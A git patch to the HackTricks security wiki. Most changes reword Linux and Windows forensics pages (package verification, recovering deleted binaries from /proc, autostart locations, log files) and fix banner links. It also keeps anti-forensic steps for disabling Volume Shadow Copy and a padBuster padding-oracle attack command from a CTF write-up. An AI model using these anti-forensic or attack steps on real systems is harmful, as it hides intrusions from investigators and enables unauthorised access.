From 06a639f4af2e62e0d54938136a96b88d1d4d367c Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Wed, 7 Feb 2024 05:05:50 +0100 Subject: [PATCH] a --- SUMMARY.md | 5 - ctf-write-ups/challenge-0521.intigriti.io.md | 4 +- .../try-hack-me/hc0n-christmas-ctf-2019.md | 4 +- .../basic-forensic-methodology/README.md | 4 +- .../anti-forensic-techniques.md | 17 +- .../file-integrity-monitoring.md | 8 +- .../linux-forensics.md | 259 ++++---- .../memory-dump-analysis/README.md | 10 +- .../partitions-file-systems-carving/README.md | 61 +- .../partitions-file-systems-carving/ext.md | 252 -------- .../file-data-carving-recovery-tools.md | 4 +- .../partitions-file-systems-carving/ntfs.md | 248 -------- .../pcap-inspection/README.md | 4 +- .../pcap-inspection/dnscat-exfiltration.md | 2 +- .../pcap-inspection/wireshark-tricks.md | 7 +- .../.pyc.md | 20 +- .../browser-artifacts.md | 286 +++------ .../desofuscation-vbs-cscript.exe.md | 6 +- linux-unix/privilege-escalation/apparmor.md | 281 --------- .../privilege-escalation/docker-breakout.md | 592 ------------------ .../escaping-from-a-docker-container.md | 383 ----------- .../lxd-privilege-escalation.md | 100 --- linux-unix/privilege-escalation/seccomp.md | 164 ----- .../macos-red-teaming/macos-mdm/README.md | 36 +- .../README.md | 14 +- .../macos-bundles.md | 51 +- .../macos-memory-dumping.md | 17 +- .../macos-sensitive-locations.md | 19 +- .../macos-proces-abuse/macos-dirty-nib.md | 2 +- .../macos-electron-applications-injection.md | 2 +- .../macos-thread-injection-via-task-port.md | 14 +- .../pentesting-snmp/cisco-snmp.md | 4 +- .../buckets/firebase-database.md | 4 +- .../pentesting-web/dotnetnuke-dnn.md | 4 +- ...solation-rce-via-electron-internal-code.md | 4 +- .../pentesting-web/joomla.md | 4 +- .../pentesting-web/laravel.md | 4 +- ...e_functions-bypass-php-7.0-7.4-nix-only.md | 4 +- .../pentesting-web/tomcat.md | 4 +- .../tomcat/basic-tomcat-info.md | 4 +- pentesting-web/abusing-hop-by-hop-headers.md | 4 +- ...ypass-self-+-unsafe-inline-with-iframes.md | 30 +- pentesting-web/dependency-confusion.md | 4 +- ...er-gadgets-expandedwrapper-and-json.net.md | 4 +- ...ava-transformers-to-rutime-exec-payload.md | 4 +- .../pdf-upload-xxe-and-cors-bypass.md | 4 +- .../http-connection-request-smuggling.md | 4 +- pentesting-web/integer-overflow.md | 4 +- pentesting-web/login-bypass/README.md | 4 +- .../web-vulns-list.md | 4 +- ...blocking-main-page-to-steal-postmessage.md | 4 +- .../bypassing-sop-with-iframes-1.md | 4 +- .../bypassing-sop-with-iframes-2.md | 4 +- ...l-postmessage-modifying-iframe-location.md | 4 +- pentesting-web/sql-injection/README.md | 4 +- .../sql-injection/cypher-injection-neo4j.md | 4 +- .../sql-injection/mysql-injection/README.md | 4 +- .../pl-pgsql-password-bruteforce.md | 4 +- .../rce-with-postgresql-extensions.md | 4 +- .../rce-with-postgresql-languages.md | 4 +- .../el-expression-language.md | 4 +- .../connection-pool-by-destination-example.md | 4 +- .../cookie-bomb-+-onerror-xs-leak.md | 4 +- .../event-loop-blocking-+-lazy-images.md | 4 +- .../xs-search/javascript-execution-xs-leak.md | 4 +- .../performance.now-+-force-heavy-task.md | 4 +- .../xs-search/performance.now-example.md | 4 +- .../xs-search/url-max-length-client-side.md | 4 +- ...ble-stylesheet-language-transformations.md | 4 +- .../abusing-service-workers.md | 4 +- .../chrome-cache-to-xss.md | 4 +- .../dom-clobbering.md | 4 +- .../xss-cross-site-scripting/dom-xss.md | 4 +- .../iframes-in-xss-and-csp.md | 4 +- .../other-js-tricks.md | 4 +- .../some-same-origin-method-execution.md | 4 +- .../xss-in-markdown.md | 5 +- radio-hacking/pentesting-rfid.md | 4 +- .../linux-exploiting-basic-esp/elf-tricks.md | 4 +- .../angr/angr-examples.md | 4 +- stego/esoteric-languages.md | 4 +- todo/radio-hacking/flipper-zero/README.md | 4 +- .../radio-hacking/flipper-zero/fz-infrared.md | 4 +- todo/radio-hacking/flipper-zero/fz-nfc.md | 4 +- todo/radio-hacking/proxmark-3.md | 4 +- welcome/about-the-author.md | 4 +- welcome/getting-started-in-hacking.md | 72 --- .../abusing-ad-mssql.md | 4 +- .../shadow-credentials.md | 4 +- .../ad-dns-records.md | 4 +- .../bloodhound.md | 4 +- .../external-forest-domain-oneway-inbound.md | 4 +- .../kerberos-authentication.md | 4 +- .../kerberos-double-hop-problem.md | 4 +- .../active-directory-methodology/laps.md | 4 +- .../over-pass-the-hash-pass-the-key.md | 4 +- .../printers-spooler-service-abuse.md | 4 +- .../printnightmare.md | 4 +- .../sid-history-injection.md | 4 +- .../unconstrained-delegation.md | 4 +- windows-hardening/basic-cmd-for-pentesters.md | 4 +- .../powerview.md | 4 +- windows-hardening/lateral-movement/README.md | 4 +- .../lateral-movement/dcom-exec.md | 2 +- windows-hardening/ntlm/README.md | 4 +- .../credentials-mimikatz.md | 4 +- .../README.md | 4 +- .../access-tokens.md | 4 +- .../dpapi-extracting-passwords.md | 4 +- .../juicypotato.md | 4 +- .../msi-wrapper.md | 4 +- .../README.md | 4 +- .../abuse-seloaddriverprivilege.md | 4 +- 113 files changed, 565 insertions(+), 2732 deletions(-) delete mode 100644 forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md delete mode 100644 forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md delete mode 100644 linux-unix/privilege-escalation/apparmor.md delete mode 100644 linux-unix/privilege-escalation/docker-breakout.md delete mode 100644 linux-unix/privilege-escalation/escaping-from-a-docker-container.md delete mode 100644 linux-unix/privilege-escalation/lxd-privilege-escalation.md delete mode 100644 linux-unix/privilege-escalation/seccomp.md delete mode 100644 welcome/getting-started-in-hacking.md diff --git a/SUMMARY.md b/SUMMARY.md index eb44158da..eff16e759 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -5,8 +5,6 @@ * [HackTricks](README.md) * [HackTricks Values & faq](welcome/hacktricks-values-and-faq.md) * [About the author](welcome/about-the-author.md) -* [Getting Started in Hacking](welcome/getting-started-in-hacking.md) - ## 🀩 Generic Methodologies & Resources * [Pentesting Methodology](generic-methodologies-and-resources/pentesting-methodology.md) @@ -40,9 +38,7 @@ * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md) * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md) - * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md) * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) - * [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md) * [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md) * [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md) * [Suricata & Iptables cheatsheet](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md) @@ -60,7 +56,6 @@ * [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md) * [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md) * [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md) - * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md) * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md) * [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md) * [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md) diff --git a/ctf-write-ups/challenge-0521.intigriti.io.md b/ctf-write-ups/challenge-0521.intigriti.io.md index d9713a161..301515386 100644 --- a/ctf-write-ups/challenge-0521.intigriti.io.md +++ b/ctf-write-ups/challenge-0521.intigriti.io.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -190,7 +190,7 @@ Just press **submit** on the captcha form and the alert will be executed: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md index 3edea36f5..a057eeba2 100644 --- a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md +++ b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -57,7 +57,7 @@ perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md index 94847f335..753613771 100644 --- a/forensics/basic-forensic-methodology/README.md +++ b/forensics/basic-forensic-methodology/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -96,7 +96,7 @@ Keep in mind the possible use of anti-forensic techniques: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 905ccfeac..91f89eb8e 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -30,8 +30,7 @@ This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION ## Usnjrnl -The **USN Journal** (Update Sequence Number Journal), or Change Journal, is a feature of the Windows NT file system (NTFS) that **maintains a record of changes made to the volume**.\ -It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications to this record. +The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes. ![](<../../.gitbook/assets/image (449).png>) @@ -39,9 +38,7 @@ The previous image is the **output** shown by the **tool** where it can be obser ## $LogFile -All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\ -The logged metadata is stored in a file called β€œ**$LogFile**”, which is found in a root directory of an NTFS file system.\ -It's possible to use tools like [LogFileParser](https://github.com/jschicht/LogFileParser) to parse this file and find changes. +**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes. ![](<../../.gitbook/assets/image (450).png>) @@ -137,13 +134,11 @@ Another file that saves information about the USBs is the file `setupapi.dev.log You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) -To disable shadow copies: +To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -1. Go to the Windows start button and type "services" into the text search box; open the Services program. -2. Locate "Volume Shadow Copy" from the list, highlight it, and then right-click > Properties. -3. From the "Startup type" drop-down menu, select Disabled, and then click Apply and OK. - -![](<../../.gitbook/assets/image (453).png>) +1. Open the Services program by typing "services" into the text search box after clicking the Windows start button. +2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking. +3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK. It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 4000b7cfc..15171ca4e 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -24,12 +24,10 @@ This can also be done with the user accounts created, processes running, service ## File Integrity Monitoring -File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats.\ -The goal is to generate a **baseline of all the files** that you want to monitor and then **periodically** **check** those files for possible **changes** (in the content, attribute, metadata, etc.). +File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: -1\. **Baseline comparison,** wherein one or more file attributes will be captured or calculated and stored as a baseline that can be compared against in the future. This can be as simple as the time and date of the file, however, since this data can be easily spoofed, a more trustworthy approach is typically used. This may include periodically assessing the cryptographic checksum for a monitored file, (e.g. using the MD5 or SHA-2 hashing algorithm) and then comparing the result to the previously calculated checksum. - -2\. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified. +1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. +2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. ## Tools diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index c04ccfd77..f2ca64897 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -175,15 +175,10 @@ Get Access Today: ### Modified System Files -Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager. +Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files. -```bash -#RedHat -rpm -Va -#Debian -dpkg --verify -debsums | grep -v "OK$" #apt-get install debsums -``` +- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check. +- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues. ### Malware/Rootkit Detectors @@ -195,37 +190,31 @@ Read the following page to learn about tools that can be useful to find malware: ## Search installed programs -### Package Manager +To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories. -On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\ -On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a system. +- For Debian, inspect **_`/var/lib/dpkg/status`_** and **_`/var/log/dpkg.log`_** to fetch details about package installations, using `grep` to filter for specific information. + +- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages. + +To uncover software installed manually or outside of these package managers, explore directories like **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, and **_`/sbin`_**. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs. ```bash -#Debian +# Debian package and log details cat /var/lib/dpkg/status | grep -E "Package:|Status:" cat /var/log/dpkg.log | grep installed -#RedHat -rpm -qa --root=/ mntpath/var/lib/rpm -``` - -### Other - -**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from the source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code. - -```bash -ls /opt /usr/local -``` - -Another good idea is to **check** the **common folders** inside **$PATH** for **binaries not related** to **installed packages:** - -```bash -#Both lines are going to print the executables in /sbin non related to installed packages -#Debian +# RedHat RPM database query +rpm -qa --root=/mntpath/var/lib/rpm +# Listing directories for manual installations +ls /usr/sbin /usr/bin /bin /sbin +# Identifying non-package executables (Debian) find /sbin/ -exec dpkg -S {} \; | grep "no path found" -#RedHat +# Identifying non-package executables (RedHat) find /sbin/ –exec rpm -qf {} \; | grep "is not" +# Find exacuable files +find / -type f -executable | grep ``` +
\ @@ -236,7 +225,13 @@ Get Access Today: ## Recover Deleted Running Binaries -![](<../../.gitbook/assets/image (641).png>) +Imagina a process taht was executed from /tmp/exec and deleted. It's possible to extract it + +```bash +cd /proc/3746/ #PID with the exec file deleted +head -1 maps #Get address of the file. It was 08048000-08049000 +dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it +``` ## Inspect Autostart locations @@ -258,89 +253,87 @@ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Libra ### Services -It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. +Paths where a malware could be isntalled as a service: + +- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts. +- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions. +- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts. +- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant. +- **/etc/systemd/system**: A directory for system and service manager scripts. +- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel. +- **/usr/local/etc/rc.d/**: For custom or third-party services. +- **~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware. +- **/lib/systemd/system/**: System-wide default unit files provided by installed packages. -* _**/etc/inittab**_ -* _**/etc/rc.d/**_ -* _**/etc/rc.boot/**_ -* _**/etc/init.d/**_ -* _**/etc/inetd.conf**_ -* _**/etc/xinetd/**_ -* _**/etc/systemd/system**_ -* _**/etc/systemd/system/multi-user.target.wants/**_ ### Kernel Modules -On Linux systems, kernel modules are commonly used as rootkit components for malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. +Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include: + +- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version. +- **/etc/modprobe.d**: Contains configuration files to control module loading. +- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings. ### Other Autostart Locations -There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. +Linux employs various files for automatically executing programs upon user login, potentially harboring malware: -* _**/etc/profile.d/\***_ , _**/etc/profile**_ , _**/etc/bash.bashrc**_ are executed when any user account logs in. -* _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**\~/.profile**_ , _**∼/.config/autostart**_ are executed when the specific user logs in. -* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. +- **/etc/profile.d/***, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login. +- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, and **~/.config/autostart**: User-specific files that run upon their login. +- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment. ## Examine Logs -Look in all available log files on the compromised system for traces of malicious execution and associated activities such as the creation of a new service. +Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include: -### Pure Logs - -**Login** events recorded in the system and security logs, including logins via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\ -Interesting system logins: - -* **/var/log/syslog** (debian) or **/var/log/messages** (Redhat) - * Shows general messages and info regarding the system. It is a data log of all activity throughout the global system. -* **/var/log/auth.log** (debian) or **/var/log/secure** (Redhat) - * Keep authentication logs for both successful or failed logins, and authentication processes. Storage depends on the system type. - * `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"` -* **/var/log/boot.log**: start-up messages and boot info. -* **/var/log/maillog** or **var/log/mail.log:** is for mail server logs, handy for postfix, smtpd, or email-related services info running on your server. -* **/var/log/kern.log**: keeps in Kernel logs and warning info. Kernel activity logs (e.g., dmesg, kern.log, klog) can show that a particular service crashed repeatedly, potentially indicating that an unstable trojanized version was installed. -* **/var/log/dmesg**: a repository for device driver messages. Use **dmesg** to see messages in this file. -* **/var/log/faillog:** records info on failed logins. Hence, handy for examining potential security breaches like login credential hacks and brute-force attacks. -* **/var/log/cron**: keeps a record of Crond-related messages (cron jobs). Like when the cron daemon started a job. -* **/var/log/daemon.log:** keeps track of running background services but doesn’t represent them graphically. -* **/var/log/btmp**: keeps a note of all failed login attempts. -* **/var/log/httpd/**: a directory containing error\_log and access\_log files of the Apache httpd daemon. Every error that httpd comes across is kept in the **error\_log** file. Think of memory problems and other system-related errors. **access\_log** logs all requests which come in via HTTP. -* **/var/log/mysqld.log** or **/var/log/mysql.log**: MySQL log file that records every debug, failure and success message, including starting, stopping and restarting of MySQL daemon mysqld. The system decides on the directory. RedHat, CentOS, Fedora, and other RedHat-based systems use /var/log/mariadb/mariadb.log. However, Debian/Ubuntu use /var/log/mysql/error.log directory. -* **/var/log/xferlog**: keeps FTP file transfer sessions. Includes info like file names and user-initiated FTP transfers. -* **/var/log/\*** : You should always check for unexpected logs in this directory +- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities. +- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins. + - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events. +- **/var/log/boot.log**: Contains system startup messages. +- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services. +- **/var/log/kern.log**: Stores kernel messages, including errors and warnings. +- **/var/log/dmesg**: Holds device driver messages. +- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations. +- **/var/log/cron**: Logs cron job executions. +- **/var/log/daemon.log**: Tracks background service activities. +- **/var/log/btmp**: Documents failed login attempts. +- **/var/log/httpd/**: Contains Apache HTTPD error and access logs. +- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities. +- **/var/log/xferlog**: Records FTP file transfers. +- **/var/log/**: Always check for 